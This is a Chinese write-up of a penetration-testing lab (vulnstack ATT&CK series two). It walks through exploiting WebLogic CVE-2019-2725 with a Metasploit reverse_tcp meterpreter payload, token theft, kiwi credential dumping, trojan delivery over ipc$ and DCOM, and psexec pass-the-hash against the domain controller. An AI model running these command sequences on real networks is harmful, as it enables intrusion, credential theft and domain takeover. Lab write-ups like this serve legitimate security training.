vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:漏洞详情

拓扑结构大体如下:

环境搭建

Kali

ip:192.168.111.135

Web

Ip1:192.168.111.80

Ip2:10.10.10.80

os:windows 2008

应用:weblogic 10.3.6 mssql 2008

Pc

Ip1:192.168.111.201

Ip2:10.10.10.201

Os:windows7

DC

ip:10.10.10.10

os:windows 2012

应用:AD域

内网:10.10.10.0/24

外网:192.168.111.0/24

从web机开始渗透, 这里需要手动开启服务,在C:

\Oracle\Middleware\user_projects\domains\base_domain\bin 有一个startweblogic的批处理, 然后管理员身份运行

账号/密码:Administrator/1qaz@WSX

目录

外网信息收集与渗透


外网信息收集与渗透

外网渗透

  • 先开始nmap扫描一下192.168.111.0/24存活主机

然后对80 主机进行信息收集扫描

通过445端口开放就存在smb服务可能还会有ms17-010/端口溢出漏洞.

开放139端口 就存在samba服务 于是判断可能会有/远程命令执行漏洞

开放1433端口 就存在mssql服务 有可能存在爆破/注入/SA弱口令

开放3389 那就是远程桌面喽

7001端口 百度了一下得知是 weblogic服务

一键漏洞扫描检测工具,提供一键poc检测,收录几乎全部weblogic历史漏洞。
https://github.com/rabbitmask/WeblogicScan 原版
https://github.com/dr0op/WeblogicScan 修改版,多一个CVE检测,高亮美化

weblogicScan进行扫描漏洞

然后百度了一下 CVE-2019-2725漏洞

CVE-2019-2725是一个 weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder(xml解码器)反序列化漏洞

然后通过msf查看一下漏洞利用脚本

然后进入开始利用模块

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice 进入CVE-2019-2725攻击漏洞模块

set target windows      这个模块默认是unix 所以我们的目标是windows 所以 改一下即可

Set payload  windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.111.135

Set rhosts 192.168.111.80  要攻击目标

run

内网提权

本来想直接提权,但是发现不能提system权限

system权限

方法1.

然后通过显示进程pid 然后用 migrate 进行进程迁移 获得system权限

方法2.

还可以通过令牌窃取的方式进行提权

load incognito             #加载incognito(伪装)

Getuid                         #查看当前token

list_tokens -u              #列出可用token

impersonate_token "NT AUTHORITY\\SYSTEM"     #token窃取,格式为impersonate_token"主机名\\用户名"

rev2self                      #返回之前的token

然后使用 kiwi 获取 hash 账号密码

然后获得了域里的用户和密码 下面使用用户密码进行远程登录

开始第二阶段的信息搜集

Net  config workstation  #查域信息

得到域信息 还有10.10.10.0/24网段

设置一条通往10.10.10.0/24网段的路由

然后设置代理

使用use post/windows/gather/arp_scanner模块

扫描网段存活主机

然后又通过web 进行信息收集了一下

得知 10.10.10.10 就是域控

域成员 处理web  还有一个PC机

然后判断PC ip是10.10.10.201

下面渗透pc域用户

方法一

首先用kali生成一个payload

然后通过web机 上传到 10.10.10.201c盘

先上传到web里

再控制WEB主机与PC建立一个ipc$连接:

net use \\10.10.10.201\ipc$ "lbb1111.." /user:administrator

然后把刚才上传的文件copy到10.10.10.201 c盘

然后再meterpreter中载入powershell模块

在powershell里面执行如下命令,控制WEB主机使用DCOM在远程机器PC上执行刚刚上传到PC主机C盘里的木马:

然后从新开启一个msf 监听生成的 payload 1520 端口

成功反弹

下面开始提权

方法二

代理nmap扫描10.10.10.201

使用 exploit/windows/smb/psexec模块进行哈希传递

由于一开始再web机得知了域\用户\密码

说以就可以用这个模块直接打了

Set smbdomain  DE1AY  #域

Set smbuser  administrator # 域用户

Set smbpass  lbb1111..     #域用户密码

直接system权限

通过扫描得知3389是开哒

然后尝试一下代理远程能不能直接登录

  • 向DC 域控发起进攻

同样直接利用msf的exploit/windows/smb/psexec模块进行哈希传递

拿下域控制器 并且是system权限

ATTCK实战系列(二)相关推荐

  1. xen虚拟化实战系列(二)之xen虚拟机安装

    xen虚拟化实战系列文章列表 xen虚拟化实战系列(一)之xen虚拟化环境安装 xen虚拟化实战系列(二)之xen虚拟机安装 xen虚拟化实战系列(三)之xen虚拟机复制 xen虚拟化实战系列(四)之 ...

  2. 【Youtobe trydjango】Django2.2教程和React实战系列二【settings配置文件】

    [Youtobe trydjango]Django2.2教程和React实战系列二[settings配置文件] 1. Django项目初始化过程 2. 全貌 3. 详细解释 4. 增加其他配置 1. ...

  3. [VulnStack] ATTCK实战系列—红队实战(二)

    文章目录 0x00 环境搭建 0x01 信息收集 端口探测 目录扫描 0x02 漏洞利用 0x03 内网收集 主机信息搜集 域信息收集 内网漏洞扫描 0x04 横向渗透 MS17-010 PsExec ...

  4. ATTCK实战系列——红队实战(一)

    文章目录 环境搭建 渗透测试部分 phpmyadmin 日志 getshell yxcms 前端 XSS 任意文件写入 getshell 任意文件删除 后渗透阶段 域控信息收集 域外信息收集与渗透 3 ...

  5. ATTCK实战系列——红队实战(五)

    ATT&CK实战系列--红队实战(五) 文章目录 ATT&CK实战系列--红队实战(五) 前言 靶场搭建 网络配置 外网渗透 内网渗透 内网信息收集 msf反弹shell 设置路由 探 ...

  6. ATTCK实战系列——红队实战(—)

    ATT&CK实战系列--红队实战(-) 文章目录 ATT&CK实战系列--红队实战(-) 前言 一.环境搭建 1.1 靶场下载 1.2 网卡配置 二.外网渗透 三.内网渗透 1. 尝试 ...

  7. MP实战系列(二)之集成swagger

    其实与spring+springmvc+mybatis集成swagger没什么区别,只是之前写的太不好了,所以这次决定详细写. 提到swagger不得不提rest,rest是一种架构风格,里面有对不同 ...

  8. 红日ATTCK实战系列(一)

    靶机信息 靶机基本描述:红队实战系列,主要以真实企业环境为实例搭建一系列靶场,完全模拟ATT&CK攻击链路进行搭建 靶机下载地址:http://vulnstack.qiyuanxuetang. ...

  9. 活动目录实战系列二(主域控无法正常启动)

    今天一大早过来,发现WIN98客户端无法登陆,一检查主域控DOWN机了,没法启动.幸好做了额外DC,通过抢占PDC角色,提升额外DC为主DC,先使客户机正常登录域环境,这样我们为修复主域控争取时间.环 ...

最新文章

  1. python opencv 实现Reinhard颜色迁移算法
  2. C++零碎知识点(一)
  3. Angular 选项卡
  4. ubuntu18.04 更改apt源
  5. Spring Cloud Gateway不能使用外置tomcat部署的问题
  6. zabbix安装php7.0,Centos 7.0安装Zabbix server详细步骤(示例代码)
  7. org.apache.jasper.JasperException: An exception occurred processing JSP page /admin/jiaoshi/daochuEx
  8. [Selenium] 操作新弹出窗口之验证标题和内容
  9. 成都Uber优步司机奖励政策(3月28日)
  10. VTK(0)---CMake工程
  11. 推荐一款好用的加密软件 filepackage 文件加密 U盘加密 移动硬盘加密
  12. 机械专业向机器人工程专业转型的可行性与前景分析
  13. 不同手机型号图文预览_手机型号的不同后缀都代表什么意思?看完买手机再也不入坑!...
  14. 通用型二阶卡尔曼滤波算法
  15. HSB”、lab、CMYK、RGB有什么区别
  16. Single Image Dehazing via Multi-Scale Convolutional Neural Networks
  17. Hystrix断路器配置
  18. 注塑模具设计时,需要依据哪些设定原则?
  19. C#开发BIMFACE系列18 服务端API之获取模型数据3:获取构件属性
  20. 深入浅出 Webpack

热门文章

  1. ContentResolver
  2. 基于出库单申请电子面单的API接口文档
  3. 看完相当于学过并实践用过arduino! ——复现arduino开发板的众多小实验
  4. 计算机兴趣小组电脑画图教案,电脑绘画兴趣小组教学教案.doc
  5. php的js定义全局变量,使用vue.js怎么定义全局变量
  6. 28个案例问题分析---22---原型图的面向对象--xiaopiu
  7. linux动态调频响应时间,CPU动态调频(linux 3.14.0)一
  8. 好的履历表应包含的内容
  9. spdy_header
  10. EasyUI入门(DataGrid)